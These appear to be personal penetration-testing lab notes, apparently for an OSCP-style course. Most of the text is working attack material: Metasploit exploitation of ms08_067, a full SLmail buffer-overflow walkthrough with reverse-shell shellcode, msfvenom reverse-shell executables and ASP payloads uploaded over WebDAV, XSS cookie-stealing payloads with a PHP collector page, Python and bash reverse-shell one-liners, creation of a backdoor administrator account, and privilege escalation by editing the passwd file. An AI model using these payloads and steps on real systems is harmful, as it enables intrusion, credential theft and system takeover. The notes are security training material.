exploitation
metasploit
exploit/windows/smb/ms08_067_netapi
msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > options
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > options
msf exploit(ms08_067_netapi) > set rhost 10.11.1.5
rhost => 10.11.1.5
msf exploit(ms08_067_netapi) > set lhost 10.11.0.81
lhost => 10.11.0.81
msf exploit(ms08_067_netapi) > options
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 10.11.0.81:4444
[*] 10.11.1.5:445 - Automatically detecting the target...
[*] 10.11.1.5:445 - Fingerprint: Windows XP - Service Pack 0 / 1 - lang:Unknown
[*] 10.11.1.5:445 - Selected Target: Windows XP SP0/SP1 Universal
[*] 10.11.1.5:445 - Attempting to trigger the vulnerability...
[*] Sending stage (179267 bytes) to 10.11.1.5
[*] Meterpreter session 1 opened (10.11.0.81:4444 -> 10.11.1.5:2985) at 2018-02-06 12:29:12 -0500
#######################################################
from command line;:
searchsploit term
msfconsole
use 'search' to find exploits to use
use 'use' to bounce around various tools withing metasploit
use 'show options' to see what is changable
'show payloads' lets you know what can be sent
- set payload windows/meterpreter/reverse_tcp
- sets up a reverce tcp connection
use 'set' to define options
use 'run' when you are ready to shoot the exploit
####################################################
meterpreter
upon first contact
- 'getuid' to see who you are
- 'background' to background a seesion and use another exploit
- 'session -l' lists out active sessions
- 'session -i 1' to bring a backgrounded back up
- '?' displays commands
to get away from a flaky process
- use 'ps' to list processes
- use 'migrate' to move to a more stable process
####################################################
search mimikatz
use post/windows/gather/credentials/sso
- when this is run, password for the windows machine will be returned
sessions -l lists open sessions
####################################################
use auxiliary/scanner/http/webdav_scanner
show options
use 'set' to define options
set RHOSTS 10.11.1.1-254
use 'run' when you are ready to shoot the exploit
use 'use' to bounce around various tools withing metasploit
use 'search' to find exploits to use
search slmail
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/pop3/seattlelab_pass 2003-05-07 great Seattle Lab Mail 5.5 POP3 Buffer Overflow
use the 'Name' from above
use 'options' to see what is changable
show payloads lets you knwo what can be sent
set payload windows/meterpreter/reverse_tcp
- sets up a reverce tcp connection
within metterptreter:
- getuid to find out who you are
- ? - displays commands
search mimikatz
use post/windows/gather/credentials/sso
sessions -l lists open sessions
buffer overflow
Buffer Overflow (slmail example):
1 - fuzzing
widows:
start slmail server
start imuunity debugger (ID)
attach slmail to ID
let slmail run (hit the play button)
command:
python fuzzer.py
this will step through higher and higher values until slamil crashes
2 - recreate
windows:
detach slmail from ID
stop ID
stop slmail
start slmail
start ID
attach slmail to ID
let slmail run (hit the play button)
(chorus)
command:
python slmail-pop3.py (with 2700 As in it)
this ends the the same amount of characters as fuzzer did
this will also serve as the baseleine for future exploiting
3 - locate the EIP
windows:
chorus
command:
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700
creates a unique pattern:
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9
replace the 2700 As with that pattern
python slmail-pop3.py
windows:
the EIP will be a special character string
command:
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 39694438
results indicate exactly where the EIP resides (2606 in this case)
4 - test EIP location
windows:
chorus
command:
replace the special string with "A"*2606 + "B"*4 + "C"*90
where the As should lead up to the EIP, the Bs should fiull the EIP, and the Cs should start right after
python slmail-pop3.py
windows:
the EIP should be 42424242
5 - test for exploit space
windows:
chorus
command:
replace the special string with "A"*2606 + "B"*4 + "C"*(3500-2606-4)
this will tell us how much space we have for an exploit. the 3500 could be higher or lower, this was just going for about 400 bytes i think.
python slmail-pop3.py
if everything works the same, this length is good.
6 - test for bad characters
windows:
chorus
command:
replace the character strings with a bad character list
"x01x02x03x04x05x06x07x08x09x0ax0bx0cx0dx0ex0fx10"
"x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20"
"x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30"
"x31x32x33x34x35x36x37x38x39x3ax3bx3cx3dx3ex3fx40"
"x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50"
"x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5fx60"
"x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70"
"x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7fx80"
"x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90"
"x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0"
"xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0"
"xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0"
"xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0"
"xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0"
"xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0"
"xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff"
python slmail-pop3.py
run this as often as needed to find all the bad characters....look in ID bottom left window, i.e. characters that will make the exploit crash
common characters includ x00, x0a, and x0d
7 - redirecting execution
windows:
chorus
in ID, type !mona modules
look for Base addresses that don't have restricted characters, aslr, or others, 4 falses?? last column can be true
then hit the "e" on the command bar to bring up executable modules
look for the .ddl you found on the last page, double click it
in the top left window, right click
search for
command ==> jmp esp
sequence of commands ==> "push esp" "retn"
if these fail
hit "m" on the command bar
search down Owner column for .dll
command:
ruby /usr/share/metasploit-framework/tools/nasm_shell.rb
at the ruby prompt:
type "jmp esp"
returns
00000000 FFE4 jmp esp
windows:
!mona find -s "\xff\xe4" -m slmfc.dll
highlight the first line from the bottom of the page
0x5f4a358f in this case
click the button on the command bar with the long arrow pointing right
enter the hex from the top row in the box
8 - testing last step
windows:
chorus
command:
edit slmail-pop3.py:
buffer = "A"*2606 +"\x8f\x35\x4a\x5f" +"C"*(3500-2606-4)
NOTICE the reversed hex!!!!!!!!!!!!
windows:
set expression to follow...the original hex
this will let us know if the overflow will hit on that address
command:
python slmail-pop3.py
windows:
bottom of ID will show if program stopped at our breakpoint
chorus
9 - shellcode payload
command: windows/meterpreter/reverse_tcp??????
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.81 LPORT=443 -f c -a x86 --platform windows
but this outputs code with restricted characters
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of c file: 1386 bytes
unsigned char buf[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
"\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68"
"\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x0a\x0b\x00\x51\x68"
"\x02\x00\x01\xbb\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
"\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2"
"\x56\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6"
"\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44"
"\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56"
"\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff"
"\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6"
"\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5";
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.81 LPORT=443 -f c -a x86 --platform windows -b "\x00\x0a\x0d" - e x86/shikata_ga_nai
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1500 bytes
unsigned char buf[] =
"\xbe\x35\x8d\xa2\xb0\xda\xd0\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
"\x52\x83\xea\xfc\x31\x72\x0e\x03\x47\x83\x40\x45\x5b\x73\x06"
"\xa6\xa3\x84\x67\x2e\x46\xb5\xa7\x54\x03\xe6\x17\x1e\x41\x0b"
"\xd3\x72\x71\x98\x91\x5a\x76\x29\x1f\xbd\xb9\xaa\x0c\xfd\xd8"
"\x28\x4f\xd2\x3a\x10\x80\x27\x3b\x55\xfd\xca\x69\x0e\x89\x79"
"\x9d\x3b\xc7\x41\x16\x77\xc9\xc1\xcb\xc0\xe8\xe0\x5a\x5a\xb3"
"\x22\x5d\x8f\xcf\x6a\x45\xcc\xea\x25\xfe\x26\x80\xb7\xd6\x76"
"\x69\x1b\x17\xb7\x98\x65\x50\x70\x43\x10\xa8\x82\xfe\x23\x6f"
"\xf8\x24\xa1\x6b\x5a\xae\x11\x57\x5a\x63\xc7\x1c\x50\xc8\x83"
"\x7a\x75\xcf\x40\xf1\x81\x44\x67\xd5\x03\x1e\x4c\xf1\x48\xc4"
"\xed\xa0\x34\xab\x12\xb2\x96\x14\xb7\xb9\x3b\x40\xca\xe0\x53"
"\xa5\xe7\x1a\xa4\xa1\x70\x69\x96\x6e\x2b\xe5\x9a\xe7\xf5\xf2"
"\xdd\xdd\x42\x6c\x20\xde\xb2\xa5\xe7\x8a\xe2\xdd\xce\xb2\x68"
"\x1d\xee\x66\x3e\x4d\x40\xd9\xff\x3d\x20\x89\x97\x57\xaf\xf6"
"\x88\x58\x65\x9f\x23\xa3\xee\xaa\xb8\xab\xbf\xc2\xbc\xab\x3e"
"\xa8\x48\x4d\x2a\xde\x1c\xc6\xc3\x47\x05\x9c\x72\x87\x93\xd9"
"\xb5\x03\x10\x1e\x7b\xe4\x5d\x0c\xec\x04\x28\x6e\xbb\x1b\x86"
"\x06\x27\x89\x4d\xd6\x2e\xb2\xd9\x81\x67\x04\x10\x47\x9a\x3f"
"\x8a\x75\x67\xd9\xf5\x3d\xbc\x1a\xfb\xbc\x31\x26\xdf\xae\x8f"
"\xa7\x5b\x9a\x5f\xfe\x35\x74\x26\xa8\xf7\x2e\xf0\x07\x5e\xa6"
"\x85\x6b\x61\xb0\x89\xa1\x17\x5c\x3b\x1c\x6e\x63\xf4\xc8\x66"
"\x1c\xe8\x68\x88\xf7\xa8\x99\xc3\x55\x98\x31\x8a\x0c\x98\x5f"
"\x2d\xfb\xdf\x59\xae\x09\xa0\x9d\xae\x78\xa5\xda\x68\x91\xd7"
"\x73\x1d\x95\x44\x73\x34";
edit slmail-pop3.py thusly:
shellcode = ("\xbe\x35\x8d\xa2\xb0\xda\xd0\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
"\x52\x83\xea\xfc\x31\x72\x0e\x03\x47\x83\x40\x45\x5b\x73\x06"
"\xa6\xa3\x84\x67\x2e\x46\xb5\xa7\x54\x03\xe6\x17\x1e\x41\x0b"
"\xd3\x72\x71\x98\x91\x5a\x76\x29\x1f\xbd\xb9\xaa\x0c\xfd\xd8"
"\x28\x4f\xd2\x3a\x10\x80\x27\x3b\x55\xfd\xca\x69\x0e\x89\x79"
"\x9d\x3b\xc7\x41\x16\x77\xc9\xc1\xcb\xc0\xe8\xe0\x5a\x5a\xb3"
"\x22\x5d\x8f\xcf\x6a\x45\xcc\xea\x25\xfe\x26\x80\xb7\xd6\x76"
"\x69\x1b\x17\xb7\x98\x65\x50\x70\x43\x10\xa8\x82\xfe\x23\x6f"
"\xf8\x24\xa1\x6b\x5a\xae\x11\x57\x5a\x63\xc7\x1c\x50\xc8\x83"
"\x7a\x75\xcf\x40\xf1\x81\x44\x67\xd5\x03\x1e\x4c\xf1\x48\xc4"
"\xed\xa0\x34\xab\x12\xb2\x96\x14\xb7\xb9\x3b\x40\xca\xe0\x53"
"\xa5\xe7\x1a\xa4\xa1\x70\x69\x96\x6e\x2b\xe5\x9a\xe7\xf5\xf2"
"\xdd\xdd\x42\x6c\x20\xde\xb2\xa5\xe7\x8a\xe2\xdd\xce\xb2\x68"
"\x1d\xee\x66\x3e\x4d\x40\xd9\xff\x3d\x20\x89\x97\x57\xaf\xf6"
"\x88\x58\x65\x9f\x23\xa3\xee\xaa\xb8\xab\xbf\xc2\xbc\xab\x3e"
"\xa8\x48\x4d\x2a\xde\x1c\xc6\xc3\x47\x05\x9c\x72\x87\x93\xd9"
"\xb5\x03\x10\x1e\x7b\xe4\x5d\x0c\xec\x04\x28\x6e\xbb\x1b\x86"
"\x06\x27\x89\x4d\xd6\x2e\xb2\xd9\x81\x67\x04\x10\x47\x9a\x3f"
"\x8a\x75\x67\xd9\xf5\x3d\xbc\x1a\xfb\xbc\x31\x26\xdf\xae\x8f"
"\xa7\x5b\x9a\x5f\xfe\x35\x74\x26\xa8\xf7\x2e\xf0\x07\x5e\xa6"
"\x85\x6b\x61\xb0\x89\xa1\x17\x5c\x3b\x1c\x6e\x63\xf4\xc8\x66"
"\x1c\xe8\x68\x88\xf7\xa8\x99\xc3\x55\x98\x31\x8a\x0c\x98\x5f"
"\x2d\xfb\xdf\x59\xae\x09\xa0\x9d\xae\x78\xa5\xda\x68\x91\xd7"
"\x73\x1d\x95\x44\x73\x34")
buffer = "A"*2606 +"\x8f\x35\x4a\x5f" + "\x90"*16 + shellcode + "C"*(3500-2606-4-351-16)
gets us there + our working buffer + shellcode + padding
command:
nc -lvp 443
python slmail-pop3.py
get a shell??
custom exe
step 1:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.81 LPORT=4444 -f exe -o shell_rev_4444.exe
- this makes the exe file
step 2:
mv shell_rev_4444.exe /var/www/html/shell_rev_4444.exe
- this moves the file to the internal webpage
apachectl start
- starts up the website
step 3:
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.11.0.81
run
- this sets up the LP for the .exe to call back to
step 4:
go to the windows rig and download the .exe
run it
step 5:
the LP will react
getuid
getsystem
ps
migrate (to low PID like wininit.exe)
example 1
target_pc *.5
windows xp / 445
ms08-067 - exploit/windows/smb/ms08_067_netapi
once in the box:
search -f proof.txt
getuid
#ctrl-insert for screen shot
ps
ipconfig
netstat
systeminfo
1 shell
2 systeminfo
3 exit
hashdump
mimikatz
1 background meterpreter
2 search mimikatz
3 fix it up
4 run it
add account to log into target
1 shell
2 net user hacker P@ssword1234 /add
3 net localgroup administrators hacker /add
4 exit
rdesktop 10.11.1.5
- to log into target_pc
clean up afterwards
1 shell
2 net user hacked /delete
3 exit
web application attacks
WEB APPLICATION ATTACKS:
10.11.1.251
view page source:
<html>
<body style="background:#000000;color:#86DD1D">
<h1 style="text-align:center">s3@n</h1>
<h2 style="text-align:center">
<script>
var _0xfc44=["\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x22\x77\x70\x2F\x6C\x6F\x67\x6F\x2E\x6A\x70\x67\x22","\x77\x72\x69\x74\x65"];document[_0xfc44[1]](_0xfc44[0]);
#######################################
<img src="wp/logo.jpg"write
^wordpress i suppose???
#######################################
</script>
</h2>
</body>
</html>
FUCK BURPSUITE.....SAME SAME
sqlmap??????????? GUESS I'LL FUCKING LEARN IT ON MY OWN
dbs
is-dba
tables
columns
PATH=
LIBRARY=
could be changable to something i wrote or whatnot
xss
XSS
Cross Site Scripting
<i> italics tag to see if it works
<script>alert("XSS")</script>
<script src="http://asite.com/myxss.js"></script>
<script>window.location='http://asite.com/myxss.js'</script>
#########################cookiemonster.php
<?php
if (isset($_GET['cookie']))
{
$file = 'stolenCookies.txt';
file_put_contents($file, $_GET['cookie'].PHP_EOL, FILE_APPEND;
}
?>
<!DOCTYPE html>
<html>
<title> XSS Tutorial #4</title>
<body>
<h1 align="center"> oh no something went wrong </h1>
</body>
</html>
########################
to use the above to redirect:
<script>window.location='http://localhost/xss/4/cookiemonster.php?cookie='+escape(document.cookie)</script>
to use above to hover attack:
<a href="http://www.youtube.com/" onmouseover="window.location='http://localhost/xss/4/cookiemonster.php?cookie='+escape(document.cookie)">then actual url</a>
########################
a forced comment:
http://localhost/xss/4/index.php?name=<script>window.unload=function(){document.getElementsByName('comment')[0].innerHTML='XSS is fun';document.getElementById('post').submit();}</script>
##############################
To avoid a basic filter:
<script>alert(String.fromCharCode(88,83,83))</script>
##############################
address bar scripts:
javascript:alert("hello")
##################################
<a href=javascript:alert(String.fromCharCode(88,83,83))>click me</a>
<a href=javascript:alert("XSS")>click me</a>
#######################################
ascii decimal encoded
javascript:alert('XSS')
javascript:alert('XSS')
OWASP's filter evvasion cheat sheet!!!!!!
search for exploit
searchsploit (name of service to exploit.....example: slmail)
--------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms/)
--------------------------------------------- ----------------------------------
SLmail Pro 6.3.1.0 - Multiple Remote Denial | windows/dos/31563.txt
Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' | windows/remote/16399.rb
Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' | windows/remote/638.py
Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' | windows/remote/643.c
Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' | windows/remote/646.c
--------------------------------------------- ----------------------------------
locate (path to the exploit, example windows/remote/16399.rb)
/usr/share/exploitdb/platforms/windows/remote/16399.rb
vi (nano??) the exploit's path (example see the above line)
pdf attack
client side attack using PDF
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.11.0.81
exploit
sendemail -t pedro@thinc.local -f jeff@thinc.local -s 10.11.1.229 -u Report -a report.pdf
migrate quick to an NT process
if you migrate into a NT /SYSTEM
curl
curl as a search engine against robots.txt
otrs 5 free website
^^^^
root@localhost
....
https://www.exploit-db.com/exploits/43853/
#########################################
1. Authenticate to an agent account. <path>/index.pl
2. Open "Admin" tab. <path>/index.pl?Action=Admin
3. Open "SysConfig" link. <path>/index.pl?Action=AdminSysConfig
4. Find the "Crypt:PGP" subgroup. <path>/index.pl?Action=AdminSysConfig;Subaction=Edit;SysConfigSubGroup=Crypt%3A%3APGP;SysConfigGroup=Framework
5. Manipulate form parameters and use "Update" button to save:
"PGP"
-Default: No
-New: Yes
"PGP::Bin"
-Default: /usr/bin/gpg
-New: <shell command including executables the webserver user has execute permissions for, no options>
-PoC (Reverse Python Shell): /usr/bin/python
"PGP::Options"
-Default: --homedir /opt/otrs/.gnupg/ --batch --no-tty --yes
-New: <any command options>
-PoC (Reverse Python Shell): -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.0.81",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
6. Open "Admin" tab. <path>/index.pl?Action=Admin
7. Open "PGP Keys" to execute saved command. <path>/index.pl?Action=AdminPGP
Behavior will vary based on commands. The above PoC opened a stable, no TTY, reverse shell under the "apache" user. The page eventually timed out with a 502 error, but the web application seems otherwise unaffected. Killing the shell before timeout advances the web application to the proper "PGP Management" page. The exploit can be repeated unlimited times with step #7 above.
follow the instructions above from the exploit
pentest monkey python reverse shell one liner hackon coffee provides the one liner reverse shell
##############################################
this gets a user shell
privesc:
pass the target linuxprivchecker.py
and run it
you see that passwd is world writable so....
edit the passwd remove the x from root
example 2
ms08_067_netapi
what was keyed on to find an exploit?
| Public Options: PUT, POST, COPY, MOVE
See if you can just get right in using Cadaver (why??????????????????????????)
command:
cadaver http://10.11.1.229
dav:/>ls
Listing collection `/': succeeded.
Coll: _private 0 Feb 18 2008
Coll: _vti_cnf 0 Feb 18 2008
Coll: _vti_log 0 Feb 18 2008
Coll: _vti_pvt 0 Feb 18 2008
Coll: _vti_script 0 Feb 18 2008
Coll: _vti_txt 0 Feb 18 2008
Coll: aspnet_client 0 Feb 18 2008
Coll: images
- make a sample file aaaa.txt
dav:/> put aaaa.txt
Uploading aaaa.txt to `/aaaa.txt':
Progress: [=============================>] 100.0% of 9 bytes succeeded.
dav:/> ls
Listing collection `/': succeeded.
Coll: _private 0 Feb 18 2008
Coll: _vti_cnf 0 Feb 18 2008
Coll: _vti_log 0 Feb 18 2008
Coll: _vti_pvt 0 Feb 18 2008
Coll: _vti_script 0 Feb 18 2008
Coll: _vti_txt 0 Feb 18 2008
Coll: aspnet_client 0 Feb 18 2008
Coll: images 0 Feb 18 2008
aaaa.txt 9 Feb 8 09:33
- make a exploit file using msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.11.0.81 lport=4444 -f asp > bbb.txt
- upload that file
dav:/> put bbb.txt
Uploading bbb.txt to `/bbb.txt':
Progress: [=============================>] 100.0% of 38664 bytes succeeded.
- make target think the .txt is an .asp
dav:/> move bbb.txt bbb.asp
- set up an LP in kali:
msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.11.0.81
msf exploit(handler) > exploit
- bring up browser
http://10.11.1.229/bbb.asp;.txt
- background that connection.
example 3
nmap -A 10.11.1.72
nmap -p- -sT 10.11.1.72 <=====full port scan
port 4555 JAMES admin portal
dirbuster (uncheck be recurrsive, medium list)
telnet into 4555
google default creds
root
root
set passwords of all users to their name????????
telnet port 110
pop3 commands
USER ryuu
PASS
LIST
RETR ######
log into ssh ryuu using password from email
escape from restricted linux shells <==none work
grab that python script that makes the /../../../......
change payload of python script to:
bash -i .& /dev/tcp/IP addie/port 0>&1 <=====reverse shell cheat sheet
set up a listener
python script IP
then log in as ryuu
PATH=/bin:/usr/bin
echo $0 to see what shell you are in
need to be in a tty shell to have full interaction with the box
some sort of pty python command....pty.spawn NETSEC
